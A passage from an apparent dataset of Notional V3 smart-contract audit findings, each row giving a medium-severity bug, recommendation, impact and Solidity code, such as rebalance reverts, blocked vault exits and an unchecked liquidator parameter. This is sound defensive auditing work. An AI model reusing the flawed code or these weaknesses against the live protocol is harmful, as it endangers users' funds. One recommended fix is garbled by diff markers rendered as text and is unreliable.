exchange rates\\n uint256 exchangeRate = cToken.interestRateModel() == INTEREST_RATE_MODEL\\n ? _viewExchangeRate()\\n : cToken.exchangeRateStored();\\n _checkExchangeRate(exchangeRate);\\n\\n return int256(exchangeRate);\\n }\\n```\\n\\nTherefore, if the interest rate model has changed, `totalUnderlyingValueBefore` will not include any accrued interest and `totalUnderlyingValueAfter` will include all accrued interest. As a result, it is likely that the delta between these two amounts will exceed `Constants.REBALANCING_UNDERLYING_DELTA`, causing the rebalance to ultimately revert.\\nIt does not really make sense to not accrue interest if the interest rate model has changed unless we want to avoid any drastic changes to Notional's underlying protocol. Then we may want to explicitly revert here instead of allowing the rebalance function to still execute.","Ensure this is well understood and consider accruing interest under any circumstance. Alternatively, if we do not wish to accrue interest when the interest rate model has changed, then we need to make sure that `underlyingDelta` does not include this amount as `TreasuryAction._executeDeposits()` will ultimately update the vault's position in Compound.",The treasury manager is unable to rebalance currencies across protocols and therefore it is likely that most funds become under-utilised as a result.,"```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n 
TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n" +Debt cannot be repaid without redeeming vault share,medium,"Debt cannot be repaid without redeeming the vault share. As such, users have to redeem a certain amount of vault shares/strategy tokens at the current market price to work around this issue, which deprives users of potential gains from their vault shares if they maintain ownership until the end.\\n```\\nFile: VaultAccountAction.sol\\n function exitVault(\\n address account,\\n address vault,\\n address receiver,\\n uint256 vaultSharesToRedeem,\\n uint256 lendAmount,\\n uint32 minLendRate,\\n bytes calldata exitVaultData\\n ) external payable override nonReentrant returns (uint256 underlyingToReceiver) {\\n..SNIP..\\n // If insufficient strategy tokens are redeemed (or if it is set to zero), then\\n // redeem with debt repayment will recover the repayment from the account's wallet\\n // directly.\\n underlyingToReceiver = underlyingToReceiver.add(vaultConfig.redeemWithDebtRepayment(\\n vaultAccount, receiver, vaultSharesToRedeem, exitVaultData\\n ));\\n```\\n\\nThere is a valid scenario where users want to repay debt without redeeming their vault shares/strategy tokens (mentioned in the comments above ""or if it is set to zero"" at Line 251-263). In this case, the users will call `exitVault` with `vaultSharesToRedeem` parameter set to zero. 
The entire debt to be repaid will then be recovered directly from the account's wallet.\\nFollowing is the function trace of the VaultAccountAction.exitVault:\\n```\\nVaultAccountAction.exitVault\\n└─VaultConfiguration.redeemWithDebtRepayment\\n └─VaultConfiguration._redeem\\n └─IStrategyVault.redeemFromNotional\\n └─MetaStable2TokenAuraVault._redeemFromNotional\\n └─MetaStable2TokenAuraHelper.redeem\\n └─Balancer2TokenPoolUtils._redeem\\n └─StrategyUtils._redeemStrategyTokens\\n```\\n\\n```\\nFile: StrategyUtils.sol\\n function _redeemStrategyTokens(\\n StrategyContext memory strategyContext,\\n uint256 strategyTokens\\n ) internal returns (uint256 poolClaim) {\\n poolClaim = _convertStrategyTokensToPoolClaim(strategyContext, strategyTokens);\\n\\n if (poolClaim == 0) {\\n revert Errors.ZeroPoolClaim();\\n }\\n```\\n\\nThe problem is that if the vault shares/strategy tokens to be redeemed are zero, the `poolClaim` will be zero and cause a revert within the `StrategyUtils._redeemStrategyTokens` function call. Thus, users who want to repay debt without redeeming their vault shares/strategy tokens will be unable to do so.","Within the `VaultConfiguration.redeemWithDebtRepayment` function, skip the vault share redemption if `vaultShares` is zero. 
In this case, the `amountTransferred` will be zero, and the subsequent code will attempt to recover the entire `underlyingExternalToRepay` amount directly from account's wallet.\\n```\\nfunction redeemWithDebtRepayment(\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n address receiver,\\n uint256 vaultShares,\\n bytes calldata data\\n) internal returns (uint256 underlyingToReceiver) {\\n uint256 amountTransferred;\\n uint256 underlyingExternalToRepay;\\n {\\n..SNIP..\\n// Add the line below\\n if (vaultShares > 0) {\\n // Repayment checks operate entirely on the underlyingExternalToRepay, the amount of\\n // prime cash raised is irrelevant here since tempCashBalance is cleared to zero as\\n // long as sufficient underlying has been returned to the protocol.\\n (amountTransferred, underlyingToReceiver, /* primeCashRaised */) = _redeem(\\n vaultConfig,\\n underlyingToken,\\n vaultAccount.account,\\n receiver,\\n vaultShares,\\n vaultAccount.maturity,\\n underlyingExternalToRepay,\\n data\\n ); \\n// Add the line below\\n }\\n..Recover any unpaid debt amount from the account directly..\\n..SNIP..\\n```\\n\\nAlternatively, update the `StrategyUtils._redeemStrategyTokens` function to handle zero vault share appropriately. However, note that the revert at Line 154 is added as part of mitigation to the ""minting zero-share"" bug in the past audit. Therefore, any changes to this part of the code must ensure that the ""minting zero-share"" bug is not being re-introduced. 
Removing the code at 153-155 might result in the user's vault share being ""burned"" but no assets in return under certain conditions.\\n```\\nFile: StrategyUtils.sol\\n function _redeemStrategyTokens(\\n StrategyContext memory strategyContext,\\n uint256 strategyTokens\\n ) internal returns (uint256 poolClaim) {\\n poolClaim = _convertStrategyTokensToPoolClaim(strategyContext, strategyTokens);\\n\\n if (poolClaim == 0) {\\n revert Errors.ZeroPoolClaim();\\n }\\n```\\n","Users cannot repay debt without redeeming their vault shares/strategy tokens. To do so, they have to redeem a certain amount of vault shares/strategy tokens at the current market price to work around this issue so that `poolClaim > 0`, which deprives users of potential gains from their vault shares if they maintain ownership until the end.","```\\nFile: VaultAccountAction.sol\\n function exitVault(\\n address account,\\n address vault,\\n address receiver,\\n uint256 vaultSharesToRedeem,\\n uint256 lendAmount,\\n uint32 minLendRate,\\n bytes calldata exitVaultData\\n ) external payable override nonReentrant returns (uint256 underlyingToReceiver) {\\n..SNIP..\\n // If insufficient strategy tokens are redeemed (or if it is set to zero), then\\n // redeem with debt repayment will recover the repayment from the account's wallet\\n // directly.\\n underlyingToReceiver = underlyingToReceiver.add(vaultConfig.redeemWithDebtRepayment(\\n vaultAccount, receiver, vaultSharesToRedeem, exitVaultData\\n ));\\n```\\n" +Vault account might not be able to exit after liquidation,medium,"The vault exit might fail after a liquidation event, leading to users being unable to maintain their positions.\\nAssume that a large portion of the vault account gets liquidated which results in a large amount of cash deposited into the vault account's cash balance. 
In addition, interest will also start accruing within the vault account's cash balance.\\nLet $x$ be the `primaryCash` of a vault account after a liquidation event and interest accrual.\\nThe owner of the vault account decided to exit the vault by calling `exitVault`. Within the `exitVault` function, the `vaultAccount.tempCashBalance` will be set to $x$.\\nNext, the `lendToExitVault` function is called. Assume that the cost in prime cash terms to lend an offsetting fCash position is $-y$ (primeCashCostToLend). The `updateAccountDebt` function will be called, and the `vaultAccount.tempCashBalance` will be updated to $x + (-y) \\Rightarrow x - y$. If $x > y$, then the new `vaultAccount.tempCashBalance` will be more than zero.\\nSubsequently, the `redeemWithDebtRepayment` function will be called. However, since `vaultAccount.tempCashBalance` is larger than zero, the transaction will revert, and the owner cannot exit the vault.\\n```\\nFile: VaultConfiguration.sol\\n if (vaultAccount.tempCashBalance < 0) {\\n int256 x = vaultConfig.primeRate.convertToUnderlying(vaultAccount.tempCashBalance).neg();\\n underlyingExternalToRepay = underlyingToken.convertToUnderlyingExternalWithAdjustment(x).toUint();\\n } else {\\n // Otherwise require that cash balance is zero. Cannot have a positive cash balance in this method\\n require(vaultAccount.tempCashBalance == 0);\\n }\\n```\\n",Consider refunding the excess positive `vaultAccount.tempCashBalance` to the users so that `vaultAccount.tempCashBalance` will be cleared (set to zero) before calling the `redeemWithDebtRepayment` function.,"The owner of the vault account would not be able to exit the vault to maintain their position. 
As such, their assets are stuck within the protocol.",```\\nFile: VaultConfiguration.sol\\n if (vaultAccount.tempCashBalance < 0) {\\n int256 x = vaultConfig.primeRate.convertToUnderlying(vaultAccount.tempCashBalance).neg();\\n underlyingExternalToRepay = underlyingToken.convertToUnderlyingExternalWithAdjustment(x).toUint();\\n } else {\\n // Otherwise require that cash balance is zero. Cannot have a positive cash balance in this method\\n require(vaultAccount.tempCashBalance == 0);\\n }\\n```\\n +Rebalance process reverts due to zero amount deposit and redemption,medium,"Depositing or redeeming zero amount against certain external money markets will cause the rebalancing process to revert.\\nFor a specific holding (e.g. cToken), the `redeemAmounts` and `depositAmounts` are mutually exclusive. So if the `redeemAmounts` for a specific holding is non-zero, the `depositAmounts` will be zero and vice-versa. This is because of the if-else block at Lines 48-56 below. Only `redeemAmounts` or `depositAmounts` of a specific holding can be initialized, but not both.\\n```\\nFile: ProportionalRebalancingStrategy.sol\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n\\n if (targetAmount < currentAmount) {\\n unchecked {\\n redeemAmounts[i] = currentAmount - targetAmount;\\n }\\n } else if (currentAmount < targetAmount) {\\n unchecked {\\n depositAmounts[i] = targetAmount - currentAmount;\\n }\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nFor each holding, the following codes always deposit or redeem a zero value. For example, cETH holding, if the `redeemAmounts` is 100 ETH, the `depositAmounts` will be zero. (because of the if-else block). 
Therefore, `getDepositCalldataForRebalancing` function will be executed and attempt to deposit zero amount to Compound.\\n```\\nFile: ProportionalRebalancingStrategy.sol\\n rebalancingData.redeemData = oracle.getRedemptionCalldataForRebalancing(redeemHoldings, redeemAmounts);\\n rebalancingData.depositData = oracle.getDepositCalldataForRebalancing(depositHoldings, depositAmounts);\\n```\\n\\nThe problem is that the deposit/mint or redeem/burn function of certain external money markets will revert if the amount is zero. Notional is considering integrating with a few external monkey markets and one of them is AAVE.\\nIn this case, when Notional `deposit` zero amount to AAVE or `redeem` zero amount from AAVE, it causes the rebalancing process to revert because of the `onlyAmountGreaterThanZero` modifier on the AAVE's `deposit` and `redeem` function.\\n```\\nfunction deposit(address _reserve, uint256 _amount, uint16 _referralCode)\\n external\\n payable\\n nonReentrant\\n onlyActiveReserve(_reserve)\\n onlyUnfreezedReserve(_reserve)\\n onlyAmountGreaterThanZero(_amount)\\n{\\n```\\n\\n```\\nfunction redeemUnderlying(\\n address _reserve,\\n address payable _user,\\n uint256 _amount,\\n uint256 _aTokenBalanceAfterRedeem\\n)\\n external\\n nonReentrant\\n onlyOverlyingAToken(_reserve)\\n onlyActiveReserve(_reserve)\\n onlyAmountGreaterThanZero(_amount)\\n{\\n```\\n\\nThe above issue is not only limited to AAVE and might also happen in other external markets.","Consider implementing validation to ensure the contract does not deposit zero amount to or redeem zero amount from the external market.\\nFollowing is the pseudocode for the potential fixes that could be implemented within the `_getDepositCalldataForRebalancing` of the holding contract to mitigate this issue. 
The same should be done for redemption.\\n```\\nfunction _getDepositCalldataForRebalancing(\\n address[] calldata holdings, \\n uint256[] calldata depositAmounts\\n) internal view virtual override returns (\\n DepositData[] memory depositData\\n) {\\n require(holdings.length == NUM_ASSET_TOKENS);\\n for (int i = 0; i < holdings.length; i++) {\\n if (depositAmounts[i] > 0) {\\n // populate the depositData[i] with the deposit calldata to external money market>\\n }\\n }\\n}\\n```\\n\\nThe above solution will return an empty calldata if the deposit amount is zero for a specific holding.\\nWithin the `_executeDeposits` function, skip the `depositData` if it has not been initialized.\\n```\\nfunction _executeDeposits(Token memory underlyingToken, DepositData[] memory deposits) private {\\n uint256 totalUnderlyingDepositAmount;\\n\\n for (uint256 i; i < deposits.length; i++) {\\n DepositData memory depositData = deposits[i];\\n // if depositData is not initialized, skip to the next one\\n```\\n","Notional would not be able to rebalance its underlying holding. The key feature of Notional V3 is to allow its Treasury Manager to rebalance underlying holdings into various other money market protocols.\\nThis makes Notional more resilient to issues in external protocols and future-proofs the protocol. If rebalancing does not work, Notional will be unable to move its fund out of a vulnerable external market, potentially draining protocol funds if this is not mitigated.\\nAnother purpose of rebalancing is to allow Notional to allocate Notional V3's capital to new opportunities or protocols that provide a good return. If rebalancing does not work, the protocol and its users will lose out on the gain from the investment.\\nOn the other hand, if an external money market that Notional invested in is consistently underperforming or yielding negative returns, Notional will perform a rebalance to reallocate its funds to a better market. 
However, if rebalancing does not work, they will be stuck with a suboptimal asset allocation, and the protocol and its users will incur losses.",```\\nFile: ProportionalRebalancingStrategy.sol\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n\\n if (targetAmount < currentAmount) {\\n unchecked {\\n redeemAmounts[i] = currentAmount - targetAmount;\\n }\\n } else if (currentAmount < targetAmount) {\\n unchecked {\\n depositAmounts[i] = targetAmount - currentAmount;\\n }\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n +Inaccurate settlement reserve accounting,medium,"The off-chain accounting of fCash debt or prime cash in the settlement reserve will be inaccurate due to an error when handling the conversion between signed and unsigned integers.\\nEvents will be emitted to reconcile off-chain accounting for the edge condition when leveraged vaults lend at zero interest. This event will be emitted if there is fCash debt or prime cash in the settlement reserve.\\nIn an event where `s.fCashDebtHeldInSettlementReserve > 0` and `s.primeCashHeldInSettlementReserve <= 0`, no event will be emitted. As a result, the off-chain accounting of fCash debt or prime cash in the settlement reserve will be off.\\nThe reason is that since `fCashDebtInReserve` is the negation of `s.fCashDebtHeldInSettlementReserve`, which is an unsigned integer, `fCashDebtInReserve` will always be less than or equal to 0. 
Therefore, `fCashDebtInReserve` > 0 will always be false and is an unsatisfiable condition.\\n```\\nFile: PrimeRateLib.sol\\n // This is purely done to fully reconcile off chain accounting with the edge condition where\\n // leveraged vaults lend at zero interest.\\n int256 fCashDebtInReserve = -int256(s.fCashDebtHeldInSettlementReserve);\\n int256 primeCashInReserve = int256(s.primeCashHeldInSettlementReserve);\\n if (fCashDebtInReserve > 0 || primeCashInReserve > 0) {\\n int256 settledPrimeCash = convertFromUnderlying(settlementRate, fCashDebtInReserve);\\n int256 excessCash;\\n if (primeCashInReserve > settledPrimeCash) {\\n excessCash = primeCashInReserve - settledPrimeCash;\\n BalanceHandler.incrementFeeToReserve(currencyId, excessCash);\\n } \\n\\n Emitter.emitSettlefCashDebtInReserve(\\n currencyId, maturity, fCashDebtInReserve, settledPrimeCash, excessCash\\n );\\n }\\n```\\n",It is recommended to implement the following fix:\\n```\\n// Remove the line below\\n int256 fCashDebtInReserve = // Remove the line below\\nint256(s.fCashDebtHeldInSettlementReserve);\\n// Add the line below\\n int256 fCashDebtInReserve = int256(s.fCashDebtHeldInSettlementReserve);\\n```\\n,The off-chain accounting of fCash debt or prime cash in the settlement reserve will be inaccurate. 
Users who rely on inaccurate accounting information to conduct any form of financial transaction will expose themselves to unintended financial risks and make ill-informed decisions.,"```\\nFile: PrimeRateLib.sol\\n // This is purely done to fully reconcile off chain accounting with the edge condition where\\n // leveraged vaults lend at zero interest.\\n int256 fCashDebtInReserve = -int256(s.fCashDebtHeldInSettlementReserve);\\n int256 primeCashInReserve = int256(s.primeCashHeldInSettlementReserve);\\n if (fCashDebtInReserve > 0 || primeCashInReserve > 0) {\\n int256 settledPrimeCash = convertFromUnderlying(settlementRate, fCashDebtInReserve);\\n int256 excessCash;\\n if (primeCashInReserve > settledPrimeCash) {\\n excessCash = primeCashInReserve - settledPrimeCash;\\n BalanceHandler.incrementFeeToReserve(currencyId, excessCash);\\n } \\n\\n Emitter.emitSettlefCashDebtInReserve(\\n currencyId, maturity, fCashDebtInReserve, settledPrimeCash, excessCash\\n );\\n }\\n```\\n" +Rebalance stops working when more holdings are added,medium,"Notional would not be able to rebalance its underlying holding when more holdings are added.\\n```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = 
oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n\\nIf the underlying delta is equal to or larger than the acceptable delta, the rebalancing process will fail and revert as per Line 301 above.\\n`Constants.REBALANCING_UNDERLYING_DELTA` is currently hardcoded to $0.0001$. There is only 1 holding (cToken) in the current code base, so $0.0001$ might be the optimal acceptable delta.\\nLet $c$ be the underlying delta for cToken holding. Then, $0 <= c < 0.0001$.\\nHowever, as more external markets are added to Notional, the number of holdings will increase, and the rounding errors could accumulate. Let $a$ and $m$ be the underlying delta for aToken and morpho token respectively. Then $0 <= (c + a + m) < 0.0001$.\\nThe accumulated rounding error or underlying delta $(c + a + m)$ could be equal to or larger than $0.0001$ and cause the `_executeRebalance` function always to revert. As a result, Notional would not be able to rebalance its underlying holding.","If the acceptable underlying delta for one holding (cToken) is $\\approx0.0001$, the acceptable underlying delta for three holdings should be $\\approx0.0003$ to factor in the accumulated rounding error or underlying delta.\\nInstead of hardcoding the `REBALANCING_UNDERLYING_DELTA`, consider allowing the governance to adjust this acceptable underlying delta to accommodate more holdings in the future and to adapt to potential changes in market conditions.","Notional would not be able to rebalance its underlying holding. The key feature of Notional V3 is to allow its Treasury Manager to rebalance underlying holdings into various other money market protocols.\\nThis makes Notional more resilient to issues in external protocols and future-proofs the protocol. 
If rebalancing does not work, Notional will be unable to move its funds out of a vulnerable external market, potentially draining protocol funds if this is not mitigated.\\nAnother purpose of rebalancing is to allow Notional to allocate Notional V3's capital to new opportunities or protocols that provide a good return. If rebalancing does not work, the protocol and its users will lose out on the gain from the investment.\\nOn the other hand, if an external money market that Notional invested in is consistently underperforming or yielding negative returns, Notional will perform a rebalance to reallocate its funds to a better market. However, if rebalancing does not work, they will be stuck with a suboptimal asset allocation, and the protocol and its users will incur losses.","```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n" +Underlying delta is calculated on internal token balance,medium,"The underlying delta is calculated on the internal token balance, which might cause inconsistency 
with tokens of varying decimals.\\n```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n\\nThe `underlyingDelta` is denominated in internal token precision (1e8) and is computed by taking the difference between `totalUnderlyingValueBefore` and `totalUnderlyingValueAfter` in Line 300 above.\\nNext, the `underlyingDelta` is compared against the `Constants.REBALANCING_UNDERLYING_DELTA` (10_000=0.0001) to ensure that the rebalance did not exceed the acceptable delta threshold.\\nHowever, the same `Constants.REBALANCING_UNDERLYING_DELTA` is used across all tokens such as ETH, DAI, and USDC. As a result, the delta will not be consistent with tokens of varying decimals.",Consider using the external token balance and scale `Constants.REBALANCING_UNDERLYING_DELTA` to the token's decimals.,"Using the internal token precision (1e8) might result in an over-sensitive trigger for tokens with fewer decimals (e.g. 1e6) as they are scaled up and an under-sensitive one for tokens with more decimals (e.g. 
1e18) as they are scaled down, leading to inconsistency across different tokens when checking against the `Constants.REBALANCING_UNDERLYING_DELTA`.\\nThis also means that the over-sensitive one will trigger a revert more easily and vice versa.","```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n" +Secondary debt dust balances are not truncated,medium,"Dust balances in primary debt are truncated toward zero. However, this truncation was not performed against secondary debts.\\n```\\nFile: VaultAccount.sol\\n function updateAccountDebt(\\n..SNIP..\\n // Truncate dust balances towards zero\\n if (0 < vaultState.totalDebtUnderlying && vaultState.totalDebtUnderlying < 10) vaultState.totalDebtUnderlying = 0;\\n..SNIP..\\n }\\n```\\n\\n`vaultState.totalDebtUnderlying` is primarily used to track the total debt of primary currency. 
Within the `updateAccountDebt` function, any dust balance in the `vaultState.totalDebtUnderlying` is truncated towards zero at the end of the function as shown above.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function _updateTotalSecondaryDebt(\\n VaultConfig memory vaultConfig,\\n address account,\\n uint16 currencyId,\\n uint256 maturity,\\n int256 netUnderlyingDebt,\\n PrimeRate memory pr\\n ) private {\\n VaultStateStorage storage balance = LibStorage.getVaultSecondaryBorrow()\\n [vaultConfig.vault][maturity][currencyId];\\n int256 totalDebtUnderlying = VaultStateLib.readDebtStorageToUnderlying(pr, maturity, balance.totalDebt);\\n \\n // Set the new debt underlying to storage\\n totalDebtUnderlying = totalDebtUnderlying.add(netUnderlyingDebt);\\n VaultStateLib.setTotalDebtStorage(\\n balance, pr, vaultConfig, currencyId, maturity, totalDebtUnderlying, false // not settled\\n );\\n```\\n\\nHowever, this approach was not consistently applied when handling dust balance in secondary debt within the `_updateTotalSecondaryDebt` function. 
Within the `_updateTotalSecondaryDebt` function, the dust balance in secondary debts is not truncated.",Consider truncating dust balance in secondary debt within the `_updateTotalSecondaryDebt` function similar to what has been done for primary debt.,"The inconsistency in handling dust balances in primary and secondary debt could potentially lead to discrepancies in debt accounting within the protocol, accumulation of dust, and result in unforeseen consequences.",```\\nFile: VaultAccount.sol\\n function updateAccountDebt(\\n..SNIP..\\n // Truncate dust balances towards zero\\n if (0 < vaultState.totalDebtUnderlying && vaultState.totalDebtUnderlying < 10) vaultState.totalDebtUnderlying = 0;\\n..SNIP..\\n }\\n```\\n +No minimum borrow size check against secondary debts,medium,"Secondary debts were not checked against the minimum borrow size during exit, which could lead to accounts with insufficient debt becoming insolvent and the protocol incurring bad debts.\\n```\\nFile: VaultAccount.sol\\n function _setVaultAccount(\\n..SNIP..\\n // An account must maintain a minimum borrow size in order to enter the vault. 
If the account\\n // wants to exit under the minimum borrow size it must fully exit so that we do not have dust\\n // accounts that become insolvent.\\n if (\\n vaultAccount.accountDebtUnderlying.neg() < vaultConfig.minAccountBorrowSize &&\\n // During local currency liquidation and settlement, the min borrow check is skipped\\n checkMinBorrow\\n ) {\\n // NOTE: use 1 to represent the minimum amount of vault shares due to rounding in the\\n // vaultSharesToLiquidator calculation\\n require(vaultAccount.accountDebtUnderlying == 0 || vaultAccount.vaultShares <= 1, ""Min Borrow"");\\n }\\n```\\n\\nA vault account has one primary debt (accountDebtUnderlying) and one or more secondary debts (accountDebtOne and accountDebtTwo).\\nWhen a vault account exits the vault, Notional will check that its primary debt (accountDebtUnderlying) meets the minimum borrow size requirement. If a vault account wants to exit under the minimum borrow size it must fully exit so that we do not have dust accounts that become insolvent. This check is being performed in Line 140 above.\\nHowever, this check is not performed against the secondary debts. As a result, it is possible that the secondary debts fall below the minimum borrow size after exiting.",Consider performing a similar check against the secondary debts (accountDebtOne and accountDebtTwo) within the `_setVaultAccount` function to ensure they do not fall below the minimum borrow size.,"Vault accounts with debt below the minimum borrow size are at risk of becoming insolvent, leaving the protocol with bad debts.","```\\nFile: VaultAccount.sol\\n function _setVaultAccount(\\n..SNIP..\\n // An account must maintain a minimum borrow size in order to enter the vault. 
If the account\\n // wants to exit under the minimum borrow size it must fully exit so that we do not have dust\\n // accounts that become insolvent.\\n if (\\n vaultAccount.accountDebtUnderlying.neg() < vaultConfig.minAccountBorrowSize &&\\n // During local currency liquidation and settlement, the min borrow check is skipped\\n checkMinBorrow\\n ) {\\n // NOTE: use 1 to represent the minimum amount of vault shares due to rounding in the\\n // vaultSharesToLiquidator calculation\\n require(vaultAccount.accountDebtUnderlying == 0 || vaultAccount.vaultShares <= 1, ""Min Borrow"");\\n }\\n```\\n" +It may be possible to liquidate on behalf of another account,medium,"If the caller of any liquidation action is the vault itself, there is no validation of the `liquidator` parameter and therefore, any arbitrary account may act as the `liquidator` if they have approved any amount of funds for the `VaultLiquidationAction.sol` contract.\\nWhile the vault implementation itself should most likely handle proper validation of the parameters provided to actions enabled by the vault, the majority of important validation should be done within the Notional protocol. 
The base implementation for vaults does not seem to sanitise `liquidator` and hence users could deleverage accounts on behalf of a `liquidator` which has approved Notional's contracts.\\n```\\nFile: VaultLiquidationAction.sol\\n function _authenticateDeleverage(\\n address account,\\n address vault,\\n address liquidator\\n ) private returns (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) {\\n // Do not allow invalid accounts to liquidate\\n requireValidAccount(liquidator);\\n require(liquidator != vault);\\n\\n // Cannot liquidate self, if a vault needs to deleverage itself as a whole it has other methods \\n // in VaultAction to do so.\\n require(account != msg.sender);\\n require(account != liquidator);\\n\\n vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n require(vaultConfig.getFlag(VaultConfiguration.DISABLE_DELEVERAGE) == false);\\n\\n // Authorization rules for deleveraging\\n if (vaultConfig.getFlag(VaultConfiguration.ONLY_VAULT_DELEVERAGE)) {\\n require(msg.sender == vault);\\n } else {\\n require(msg.sender == liquidator);\\n }\\n\\n vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n\\n // Vault accounts that are not settled must be settled first by calling settleVaultAccount\\n // before liquidation. 
